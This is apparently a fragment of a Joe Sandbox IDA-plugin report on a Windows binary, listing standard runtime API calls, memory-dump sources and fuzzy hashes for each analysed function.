                                                                                                                    • Opcode Fuzzy Hash: 73b994899727c5eefab80e8ea20ff8c209646d2977440b92e52c199a6b9bce84
                                                                                                                    • Instruction Fuzzy Hash: 31B012C16981007D390861197C03D7F014DE4C5F10330702EF405F0680E8801C000532
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E3D343,00000001,?,?,?,00000000,00E4551D,?,?,?), ref: 00E39F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00E4551D,?,?,?,?,?,00E44FC7,?), ref: 00E39FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E3D343,00000001,?,?), ref: 00E3A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: c0020dea119e109e3999f167e62c33f706f6a0e0d4beaac1d2bc0aa3ca20eb47
                                                                                                                    • Instruction ID: 608a9a8c7caff9685b3c555ed349378c57581a7572a24a4ce88ad53c27ba0e5e
                                                                                                                    • Opcode Fuzzy Hash: c0020dea119e109e3999f167e62c33f706f6a0e0d4beaac1d2bc0aa3ca20eb47
                                                                                                                    • Instruction Fuzzy Hash: 84319F31208305AFDB18CF24D81CBBA7BA5EB84755F045529F581BB290C7B59D88CBA2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3C27E: _wcslen.LIBCMT ref: 00E3C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 78fd7a44bdb192d56b49046f11c99cabed33f9143314d4ae263da8fe1b6291c8
                                                                                                                    • Instruction ID: b20eaf32f858f14a806f082d327ea5ad95830285cc581e1104e2b2168ab01c88
                                                                                                                    • Opcode Fuzzy Hash: 78fd7a44bdb192d56b49046f11c99cabed33f9143314d4ae263da8fe1b6291c8
                                                                                                                    • Instruction Fuzzy Hash: C601B5315002106AEF21AB759C4DFEE3B88AF09784F0C6434F981F6091D754CAC5C6B2
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E5B8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: f6064bbce09ae509fdcc883d417fb6e83594383859d48880812548d5302d59ba
                                                                                                                    • Instruction ID: ef363d73c38a3aea8428c8e35fb281b012dfe8746f4dab48c8af65a05a811758
                                                                                                                    • Opcode Fuzzy Hash: f6064bbce09ae509fdcc883d417fb6e83594383859d48880812548d5302d59ba
                                                                                                                    • Instruction Fuzzy Hash: 9041FC7090438C9EDB218E25CC84BF6BBF9DB45305F1418EDD999A6142D335AA49CF60
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00E5AFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 1c4f05900d321dba14c1924e91c934ae6709ba63257f78fd90025d6b0a5a44e1
                                                                                                                    • Instruction ID: 803512f285d2efaffee51bcf1b9a74fa5ad87e132ccd3b873c1cca0128c28902
                                                                                                                    • Opcode Fuzzy Hash: 1c4f05900d321dba14c1924e91c934ae6709ba63257f78fd90025d6b0a5a44e1
                                                                                                                    • Instruction Fuzzy Hash: 42014C32644209BFCF129F91EC01DEE7FA2EF48795F054654FE1435160C6728931EB91
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E5A56F), ref: 00E5AF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 781a3025a302171d34ba12beee4f943463e16912e40c9cb1a41cef88b86b4b70
                                                                                                                    • Instruction ID: 26f64f842be19edaf7f4398845cf96a272ee6041c46bf2d8d5ffa3434b65989d
                                                                                                                    • Opcode Fuzzy Hash: 781a3025a302171d34ba12beee4f943463e16912e40c9cb1a41cef88b86b4b70
                                                                                                                    • Instruction Fuzzy Hash: ECF05931685208BFCF125F21EC02C9EBFE0EF44B92B014168FC087A260DA715E149795
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: 56823838e8a39da5cd8d6017f552e135606bd25a2172c779ed8d381afe17ed62
                                                                                                                    • Instruction ID: 9a64b607ef67116a661f530bb191ec1017b1de15b43737c60e56182e84d84c81
                                                                                                                    • Opcode Fuzzy Hash: 56823838e8a39da5cd8d6017f552e135606bd25a2172c779ed8d381afe17ed62
                                                                                                                    • Instruction Fuzzy Hash: CDE055306813087FC301AB2AFC0296EBBE0CB54BA6B0222A9FC00B7240CDB05E4483C6
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 2f576ffed9d8c9e967bca60ba925cf08ce931c2bd47148d70eede396b5c59a59
                                                                                                                    • Instruction ID: befb4a8d4bd398b2f455f77b81f4e0ad58c45ac12a7f45f168173ff6b1e4c232
                                                                                                                    • Opcode Fuzzy Hash: 2f576ffed9d8c9e967bca60ba925cf08ce931c2bd47148d70eede396b5c59a59
                                                                                                                    • Instruction Fuzzy Hash: EEB012D52DE200AC3548615A3C03C37014CE0C8B10330703EF856F0391D8407C000631
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: fe05063ff8a0c6e189c4ffd022515308e394569e4c59782888e7bad5a56606f4
                                                                                                                    • Instruction ID: d1ba7a9a6d83ad3af2ea9f10e65786a4e729353b97ae4287cc1d915aaf9f4d7a
                                                                                                                    • Opcode Fuzzy Hash: fe05063ff8a0c6e189c4ffd022515308e394569e4c59782888e7bad5a56606f4
                                                                                                                    • Instruction Fuzzy Hash: 1BB012D52DA100AC354862163C03C3B014CD0C9B10330F13EFC56F0380D840BC040531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 98db60dff8e3f82e8114844a1ac4553821a4670882b53f1f8021a9476eb480b9
                                                                                                                    • Instruction ID: 33f2506a6fd7a6f6ae72177c49c6c77801f238ae3a16551b3a611309a51a0637
                                                                                                                    • Opcode Fuzzy Hash: 98db60dff8e3f82e8114844a1ac4553821a4670882b53f1f8021a9476eb480b9
                                                                                                                    • Instruction Fuzzy Hash: BEB012D92DA200BC350821563C03C37010CD0C9B10330B43EFC52F0681D840BC000431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4EAF9
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3Ro
                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                    • Opcode ID: 1ec722749c1aa272699cb93cb2f326e3bf0ba02314a7c388c3c16ef6c96f2bbc
                                                                                                                    • Instruction ID: 3006eb415809d042450ca77785cb2de902e5cd1a447415663117f9addea10d8e
                                                                                                                    • Opcode Fuzzy Hash: 1ec722749c1aa272699cb93cb2f326e3bf0ba02314a7c388c3c16ef6c96f2bbc
                                                                                                                    • Instruction Fuzzy Hash: E9B012C62DA1427C3D0C72107D07C3B410CE0C0FD0330B22EF801F4181DC800C011431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ff6ec8e9a37aeddcf29ffa21a7b31b92cd255ce6f3b24a94510c277c531c3d61
                                                                                                                    • Instruction ID: 03a77eeebaecee4d1029cbac96cea0f00df5891f6d7bcec3a8473edcffe0ebc9
                                                                                                                    • Opcode Fuzzy Hash: ff6ec8e9a37aeddcf29ffa21a7b31b92cd255ce6f3b24a94510c277c531c3d61
                                                                                                                    • Instruction Fuzzy Hash: 43B012E12DA100AC354861163D03C3701CCD0C8B10330703EF856F0380DC407D010531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 23eebc377f7b6b5679bf11c0d4ec9c76a7ebed480520e994f48bd96e19075b70
                                                                                                                    • Instruction ID: d22111b043469868711eb2712e8a829a52204e9db7fdcd385f6e68e23d0df4c9
                                                                                                                    • Opcode Fuzzy Hash: 23eebc377f7b6b5679bf11c0d4ec9c76a7ebed480520e994f48bd96e19075b70
                                                                                                                    • Instruction Fuzzy Hash: 2FB012D12EB140AC354861163C03C3B018DE4C8B10330703EFC57F0390D8407C000531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 345347902d61ae2b93fc13d6f98a03c7c0824ef8e4ac0b86640dd4d6ae9d10e2
                                                                                                                    • Instruction ID: 589bf119c146882502aeb5caf20d13d32bb6c7b8735ed326faca5ae7017cd8c2
                                                                                                                    • Opcode Fuzzy Hash: 345347902d61ae2b93fc13d6f98a03c7c0824ef8e4ac0b86640dd4d6ae9d10e2
                                                                                                                    • Instruction Fuzzy Hash: DCB012D52DA100AC354861263C03C37018CD0C9B10330B03EFC56F0380D940BC000531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 3b26ef2b1a25d4e32126c59cb42460e8648bd92689e0d21bc1ff5f7d63595e8b
                                                                                                                    • Instruction ID: a5f87c659663ee43278874d4a2d6f10f105e28e5959ee81536212136111db35d
                                                                                                                    • Opcode Fuzzy Hash: 3b26ef2b1a25d4e32126c59cb42460e8648bd92689e0d21bc1ff5f7d63595e8b
                                                                                                                    • Instruction Fuzzy Hash: F1B012D52DB140AC354861163C03C37014DD0C9B10330B03EFC56F0380D840BC000531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: b2d7b9a5bcb2610d254a73c1f248936b0575ad1a19068a33e2779b5d9a787372
